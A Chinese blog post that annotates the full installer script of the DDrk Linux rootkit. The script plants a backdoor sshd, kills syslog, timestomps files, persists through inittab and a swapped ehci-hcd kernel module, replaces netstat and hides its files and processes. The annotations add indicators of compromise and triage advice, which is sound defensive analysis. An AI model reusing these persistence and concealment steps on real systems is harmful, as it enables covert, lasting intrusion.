DDrk源码分析
DDrk 是一个名气比较大的 rootkit,下面是其 setup 安装脚本。脚本里用到的 netstat、tty、ttymon、rk.ko 等程序都是直接编译好的二进制,所以无法查看其源代码;不过它们大多是在正常程序源码的基础上修改而来,目的是隐藏文件和进程。脚本本身大多带有英文注释,我在原基础上再添加一些中文说明。需要注意:下面的脚本是从网页复制来的,复制过程中反引号(`)、sed 替换中的 \n、以及 here-document 的 <<EOF 标记都丢失了,例如 BASEDIR=pwd 原本是 BASEDIR=`pwd`,kill -9 pidof ttyload 原本是 kill -9 `pidof ttyload`,所以按原样执行并不能工作,阅读时请自行还原。本文仅用于分析;脚本中出现的路径(/etc/sh.conf、/lib/libsh.so、/usr/lib/libsh、/sbin/ttyload、/sbin/ttymon、/usr/sbin/ttyload、/etc/sysconfig/modules/ehci.modules、被替换的 ehci-hcd.ko 和 /bin/netstat)可以直接作为排查被植入主机时的线索。
#!/bin/bash
##########define variables##########
# DDrk installer: drops a password-protected sshd backdoor, swaps a kernel
# module in for the USB EHCI driver, replaces netstat, and then hides every
# artifact.  Annotated here for defensive analysis only.  The listing was
# pasted from a web page and lost its backticks / heredoc marker in the
# process, so it is not runnable as written (see the NOTE(review) comments).
# Default backdoor password and sshd listening port, used when $1 / $2 are
# not given on the command line.
DEFPASS=123456
DEFPORT=43958
# NOTE(review): almost certainly `pwd` in the original; without the backticks
# BASEDIR is the literal string "pwd" and every cd $BASEDIR below would fail.
BASEDIR=pwd
# Drop directories.  /lib/libsh.so is created as a *directory* (mkdir below)
# despite the shared-library name; /usr/lib/libsh holds the tty hider tool.
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
# 清除 history 相关环境变量,使安装过程不写入 shell 历史记录
# Anti-forensics: turn off bash history so the install session never reaches
# ~/.bash_history.
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
# Make sure the sbin tools used below (killall, chattr, modprobe, ...) resolve
# regardless of the caller's PATH.
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
# 检查是否为 root:只有 root 权限才能执行该安装并使其生效
##########check is root##########
# Everything below writes into /lib, /sbin and /etc/inittab, so refuse to run
# unless root.  The “ ” characters are typographic quotes from the web page,
# not shell quotes.  Note the bare `exit`: the script exits with status 0 even
# on this failure path.
if [ “$(whoami)” != “root” ]; then
echo “BECOME ROOT AND TRY AGAIN”
echo “”
exit
fi
# 解压后门 sshd 及相关工具所在的压缩包,解压完成后删除原包
##########extract all tar##########
# Unpack the payload.  bin.tgz yields bin/ (ttymon plus a nested sshd.tgz);
# sshd.tgz yields the .sh/ directory holding the backdoor sshd binary and its
# config fragments (sshd_config, shdcf2, .bashrc), all used further down.
# Both archives are deleted once extracted.
tar zxf bin.tgz
cd bin
tar zxf sshd.tgz
rm -rf ./sshd.tgz
# NOTE(review): with BASEDIR mangled to the literal "pwd" these cd's fail;
# in the original they returned to the directory the kit was unpacked in.
cd $BASEDIR
rm -rf bin.tgz
cd $BASEDIR
# 强制结束 syslogd,安装期间不产生系统日志(脚本末尾会重新启动它)
##########kill syslogd##########
# Stop the syslog daemon for the duration of the install, presumably so the
# steps below (module reload, sshd start) leave nothing in the system logs.
# It is restarted at the very end of the script.
killall -9 syslogd >/dev/null 2>&1
sleep 2
# 删除旧的后门密码文件 /etc/sh.conf(下面会重新创建)
##########remove sh.conf##########
# /etc/sh.conf is the backdoor's password-hash file (written just below);
# clear any copy left behind by a previous install.  For defenders, the mere
# existence of this file is an indicator of compromise.
if [ -f /etc/sh.conf ]; then
rm -rf /etc/sh.conf
fi
# 对密码做 MD5 摘要(无盐)并写入 /etc/sh.conf;未指定参数时使用默认密码 123456
#########initialize sshd configuration##########
# Store the backdoor password as an unsalted MD5 of $1 (or DEFPASS).  echo -n
# keeps the newline out of the digest; what lands in /etc/sh.conf is md5sum's
# own output line ("<hex digest>  -").  The chosen password is also echoed to
# stdout in clear.  The cd into $BASEDIR/bin has no effect on this branch.
if test -n “$1” ; then
echo “Using Password : $1”
cd $BASEDIR/bin
echo -n $1|md5sum > /etc/sh.conf
else
echo “No Password Specified, using default – $DEFPASS”
echo -n $DEFPASS|md5sum > /etc/sh.conf
fi
# 把密码文件的访问/修改时间改成与 /bin/ls 相同(时间戳伪装),并将属主设为 root
# Timestomping: -r /bin/ls copies ls's access and modification times onto the
# new file so it does not stand out in an mtime-sorted listing.  The same
# trick is applied to every dropped file and directory below, so "find -newer"
# style triage will miss them; compare against package manifests instead.
touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
# 配置后门 sshd 的监听端口,未指定时使用默认端口 43958
# Assemble the backdoor sshd config: "Port <n>" ($2 or DEFPORT) is appended to
# the bundled sshd_config, then the shdcf2 fragment is appended and removed,
# and the result is renamed to shdcf -- presumably the config name the
# backdoor sshd expects (its binary is not shown).  The two branches differ
# only in the port value.  The port is echoed to stdout.
if test -n “$2” ; then
echo “Using ssh-port : $2”
echo “Port $2” >> $BASEDIR/bin/.sh/sshd_config
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
echo “No ssh-port Specified, using default – $DEFPORT”
echo “Port $DEFPORT” >> $BASEDIR/bin/.sh/sshd_config
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi
# 创建后门使用的目录(/lib/libsh.so 虽然叫 .so,其实是一个目录),并把后门 sshd、配置文件等移到这些目录中
###########creating dirs##########
# Same values as at the top of the script, re-assigned here.
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
# Wipe any previous install, recreate the two drop directories and timestomp
# them against /bin/ls.  /lib/libsh.so is a *directory* named to pass for a
# shared library; /usr/lib/libsh holds the tty hider tool and a .bashrc.
if [ -d /lib/libsh.so ]; then
rm -rf /lib/libsh.so
fi
if [ -d /usr/lib/libsh ]; then
rm -rf /usr/lib/libsh/*
fi
mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR
# Move the unpacked .sh/ payload (backdoor sshd binary, shdcf config, ...)
# into /lib/libsh.so and the bundled .bashrc into /usr/lib/libsh.
cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR
# Remove leftovers of an earlier install.  chattr strips the immutable /
# append-only / undeletable attributes first, since rm fails on those even as
# root.  The "//..." line is the blog author's note ("change ttyload's file
# attributes, see my chattr article"), not shell syntax.
if [ -f /sbin/ttyload ]; then
//修改ttyload文件的属性,具体可以看我的chattr 用法的文章
chattr -AacdisSu /sbin/ttyload
rm -rf /sbin/ttyload
fi
if [ -f /usr/sbin/ttyload ]; then
rm -rf /usr/sbin/ttyload
fi
if [ -f /sbin/ttymon ]; then
rm -rf /sbin/ttymon
fi
# Install the backdoor sshd as /sbin/ttyload (named to look like a system tty
# helper): world-executable, not world-writable, timestomped.
mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
# Kill any instance left running by a previous install.  NOTE(review): this
# was one line with backticks, kill -9 `pidof ttyload` >/dev/null 2>&1; the
# listing lost them, so as written it does not do what the author intended.
kill -9 pidof ttyload
>/dev/null 2>&1
# Same treatment for ttymon, a pre-built binary from the kit; what it does
# beyond being started alongside ttyload at boot is not visible here.
mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
touch -acmr /bin/ls /sbin/ttymon
kill -9 pidof ttymon
>/dev/null 2>&1
# Private copy of bash inside the hidden directory -- presumably the shell the
# backdoor sshd hands to its clients (the sshd binary is not shown).
cp /bin/bash $SSHDIR
# 通过修改 /etc/inittab 设置开机自启动
##########modify inittab##########
# Persistence through SysV inittab: insert "0:2345:once:/usr/sbin/ttyload"
# in front of the first getty entry (the line beginning "1:2345").  The sed
# replacement was `...ttyload\n&` in the original; the backslash is missing
# from this listing.  inittab is copied, rewritten, and its timestamps copied
# back so the edit does not change the file's mtime.
cp /etc/inittab /etc/.inittab
sed -e ‘s@^1:2345@0:2345:once:/usr/sbin/ttyloadn&@’ /etc/inittab > /etc/.inittab
touch -acmr /etc/inittab /etc/.inittab
mv -f /etc/.inittab /etc/inittab
# /usr/sbin/ttyload is a four-line launcher script: start the backdoor sshd
# (/sbin/ttyload -q) and /sbin/ttymon, then hide both pids with the tty tool
# ("i <pid>", see the hide section below).  The backticks around pidof were
# lost here as well.
echo “/sbin/ttyload -q > /dev/null 2>&1” > /usr/sbin/ttyload
echo “/sbin/ttymon > /dev/null 2>&1” >> /usr/sbin/ttyload
echo “${HOMEDIR}/tty i pidof ttyload
> /dev/null 2>&1” >> /usr/sbin/ttyload
echo “${HOMEDIR}/tty i pidof ttymon
> /dev/null 2>&1” >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod 755 /usr/sbin/ttyload
# Run the launcher now too, so the backdoor is live without a reboot.
/usr/sbin/ttyload > /dev/null 2>&1
touch -amcr /bin/ls /etc/inittab
# 修改后 /etc/inittab 中的内容如下(在第一个 mingetty 行之前插入了 ttyload;
# 这里出现了四行重复,可能是脚本被重复执行所致):
# # Run gettys in standard runlevels
# 0:2345:once:/usr/sbin/ttyload
# 0:2345:once:/usr/sbin/ttyload
# 0:2345:once:/usr/sbin/ttyload
# 0:2345:once:/usr/sbin/ttyload
# 1:2345:respawn:/sbin/mingetty tty1
# 2:2345:respawn:/sbin/mingetty tty2
# 3:2345:respawn:/sbin/mingetty tty3
# 4:2345:respawn:/sbin/mingetty tty4
# 5:2345:respawn:/sbin/mingetty tty5
# 6:2345:respawn:/sbin/mingetty tty6
# # Run xdm in runlevel 5
# x:5:respawn:/etc/X11/prefdm --nodaemon
# 检查 inittab 是否修改成功,不成功时给出提示
###########make sure inittab has modified##########
# Sanity check: warn when the inittab edit did not take.  Originally the test
# was `grep ttyload /etc/inittab` in backticks; as listed the string is a
# literal and therefore always non-empty, so the warning could never fire.
if [ ! “grep ttyload /etc/inittab
” ]; then
echo “# WARNING – SSHD WONT BE RELOADED UPON RESTART “
echo “# inittab shuffling probly fucked-up ! “
fi
# 用 rk.ko 替换 ehci-hcd.ko 并重新加载,从而装载 rootkit 的内核模块
##########load rk.ko##########
# Kernel component.  rk.ko *replaces* the stock USB EHCI host-controller
# driver at /lib/modules/$(uname -r)/kernel/drivers/usb/host/ehci-hcd.ko
# (the backticks around uname -r were lost; the path was one argument), and
# is loaded by unloading and reloading "ehci-hcd" through modprobe, so it
# shows up under that legitimate name in lsmod.  Defenders: verify that .ko
# against the distro's package (rpm -V / debsums).  The tty hider binary is
# then moved into /usr/lib/libsh.
cd $BASEDIR
modprobe -r ehci-hcd
mv -f rk.ko /lib/modules/uname -r
/kernel/drivers/usb/host/ehci-hcd.ko
modprobe ehci-hcd
mv tty $HOMEDIR
# 用木马版 netstat 替换 /bin/netstat(先把时间戳改成与原文件一致)
##########replace netstat##########
# Swap in the kit's netstat, timestomped against the real one first,
# presumably so the backdoor's listener is not shown.  Use ss, /proc/net/tcp
# or a known-good binary from read-only media when triaging.
touch -acmr /bin/netstat netstat
mv -f netstat /bin/netstat
# tty 用于隐藏进程和文件,可以用 ./tty -h 查看帮助;注意它的子命令(h 隐藏文件,i 隐藏进程)前面不加 "-",这和一般的 linux 命令不同
##########hide all files and process##########
# Hide every dropped artifact ("h <path>") and the two daemons ("i <pid>")
# with the kit's tty control tool, presumably by talking to rk.ko.  This list
# is also the complete on-disk IOC set: none of these paths exist on a clean
# host, and they are only invisible from inside the compromised kernel, so
# check from a live CD or by hashing the filesystem offline.
$HOMEDIR/tty h /etc/sh.conf > /dev/null 2>&1
$HOMEDIR/tty h /lib/libsh.so > /dev/null 2>&1
$HOMEDIR/tty h /usr/lib/libsh > /dev/null 2>&1
$HOMEDIR/tty h /sbin/ttyload > /dev/null 2>&1
$HOMEDIR/tty h /usr/sbin/ttyload > /dev/null 2>&1
$HOMEDIR/tty h /sbin/ttymon > /dev/null 2>&1
# Backticks around pidof lost in the listing, as in the launcher script above.
$HOMEDIR/tty i pidof ttyload
> /dev/null 2>&1
$HOMEDIR/tty i pidof ttymon
> /dev/null 2>&1
##########load rk.ko on boot##########
# Boot persistence for the kernel module: a script in /etc/sysconfig/modules/
# (run early at boot on RHEL/CentOS-style systems) reloads ehci-hcd, i.e. the
# rootkit module sitting in its place.  The heredoc marker `<<EOF` is missing
# from this listing, although the closing EOF survived.  The script is then
# timestomped and hidden like everything else.
cat > /etc/sysconfig/modules/ehci.modules
#!/bin/sh
#install usb modules support
modprobe -r ehci-hcd
modprobe ehci-hcd
EOF
touch -amcr /bin/ls /etc/sysconfig/modules/ehci.modules
chmod 755 /etc/sysconfig/modules/ehci.modules
$HOMEDIR/tty h /etc/sysconfig/modules/ehci.modules > /dev/null 2>&1
##########check iptables setting##########
# Informational only: print the first INPUT rules so the operator can tell
# whether the backdoor port would be filtered.  Originally
# `/sbin/iptables -L INPUT | head -5` in backticks; as listed it just echoes
# the command text.  The firewall itself is not modified.
if [ -f /sbin/iptables ]; then
echo “/sbin/iptables -L INPUT | head -5
”
else
echo “”
echo “# lucky for u no iptables found”
fi
# 重新启动 syslogd;-m 0 只是关闭周期性的 "-- MARK --" 记录,并不会禁止日志产生
##########start syslogd##########
# Bring back the syslog daemon killed at the start.  -m 0 sets syslogd's mark
# interval to zero, i.e. no periodic "-- MARK --" lines; it does not suppress
# other logging.  The restart itself leaves a gap in the logs that is worth
# looking for during incident response.
/sbin/syslogd -m 0
写在最后,有兴趣自己写 rootkit 的朋友,最好先去研究下内核和程序源码。因为目前网上能找到的 rootkit 大多逃不过被 chkrootkit 查出来的危险,而查不出来的,在网上估计也找不到。
- Author: shisekong
- Link: https://blog.361way.com/ddrk/1074.html
- License: This work is under a 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议. Kindly fulfill the requirements of the aforementioned License when adapting or creating a derivative of this work.